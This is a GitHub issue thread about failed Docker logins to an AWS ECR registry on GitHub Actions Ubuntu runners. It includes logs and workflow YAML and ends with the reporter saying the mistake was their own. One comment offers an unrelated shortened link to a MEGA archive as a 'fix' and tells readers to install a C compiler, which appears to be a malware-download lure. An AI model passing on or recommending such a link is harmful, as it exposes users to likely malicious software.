### ISSUE TITLE
Unable to login to ECR for container image since last night

### ISSUE THREAD

**Issue by FredericEgmorte** [actions/runner-images#10648]
### Description

We are unable to pull container image from ECR with credentials during the initialize container step

### Platforms affected

- [ ] Azure DevOps
- [X] GitHub Actions - Standard Runners
- [ ] GitHub Actions - Larger Runners

### Runner images affected

- [X] Ubuntu 20.04
- [X] Ubuntu 22.04
- [ ] Ubuntu 24.04
- [ ] macOS 12
- [ ] macOS 13
- [ ] macOS 13 Arm64
- [ ] macOS 14
- [ ] macOS 14 Arm64
- [ ] Windows Server 2019
- [ ] Windows Server 2022

### Image version and build link

Runner Image
  Image: ubuntu-20.04
  Version: 20240915.1.0
  Included Software: https://github.com/actions/runner-images/blob/ubuntu20/20240[9](https://github.com/tudigo-tech/tudigo-api/actions/runs/10938156540/job/30365611067#step:1:10)15.1/images/ubuntu/Ubuntu2004-Readme.md
  Image Release: https://github.com/actions/runner-images/releases/tag/ubuntu20%2F20240915.1

Or with this one
Runner Image
Image: ubuntu-22.04
  Version: 20240915.1.0
  Included Software: https://github.com/actions/runner-images/blob/ubuntu22/20240[9](https://github.com/tudigo-tech/tudigo-api/actions/runs/10936558159/job/30360449854#step:1:10)15.1/images/ubuntu/Ubuntu2204-Readme.md
  Image Release: https://github.com/actions/runner-images/releases/tag/ubuntu22%2F20240915.1

### Is it regression?

no

### Expected behavior

We log in ECR and the container image is pulled during the "Initialize container"

### Actual behavior

We get this log

```
/usr/bin/docker --config /home/runner/work/_temp/.docker_16415668-888d-4830-b07b-840a20743dc0 login 905418340137.dkr.ecr.eu-west-3.amazonaws.com -u AWS --password-stdin
  Warning: Docker login for '905418340137.dkr.ecr.eu-west-3.amazonaws.com' failed with exit code 1, back off 4.035 seconds before retry.
  /usr/bin/docker --config /home/runner/work/_temp/.docker_[16](https://github.com/tudigo-tech/tudigo-api/actions/runs/10938156540/job/30365611067#step:2:19)415668-888d-4830-b07b-840a20743dc0 login 905418340137.dkr.ecr.eu-west-3.amazonaws.com -u AWS --password-stdin
  Warning: Docker login for '905418340137.dkr.ecr.eu-west-3.amazonaws.com' failed with exit code 1, back off 8.616 seconds before retry.
  /usr/bin/docker --config /home/runner/work/_temp/.docker_16415668-888d-4830-b07b-840a20743dc0 login 9054[18](https://github.com/org/repo/actions/runs/10938156540/job/30365611067#step:2:21)340137.dkr.ecr.eu-west-3.amazonaws.com -u AWS --password-stdin
  Error: Docker login for '905418340137.dkr.ecr.eu-west-3.amazonaws.com' failed with exit code 1
```

### Repro steps

Set up a workflow as follow
The configuration of the workflow:

```
jobs:
  destroy:
    runs-on: ubuntu-latest
    container:
      image: 905418340137.dkr.ecr.eu-west-3.amazonaws.com/gh-runner:latest
      credentials:
          username: AWS
          password: ${{ secrets.AWS_ECR_PW }}
    steps:
.....
```

The secret is correctly set up and rotated regularly.

I succeeded last night and this morning, I have this error.
I tried on both ubuntu-latest and ubuntu-20.04

**Comment by Andrez092** [comment]
maybe this will help
https://bit.ly/4evXrQ6:https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
If you don't have the c compliator, install it.(gcc or clang)

**Comment by kishorekumar-anchala** [comment]
Hi @FredericEgmorte ,

Thank you for bringing this issue to us. We are looking into this issue and will update you on this issue after investigating.

**Comment by FredericEgmorte** [comment]
Hi @kishorekumar-anchala 

Finally, it was a mistake on my side. Sorry guys
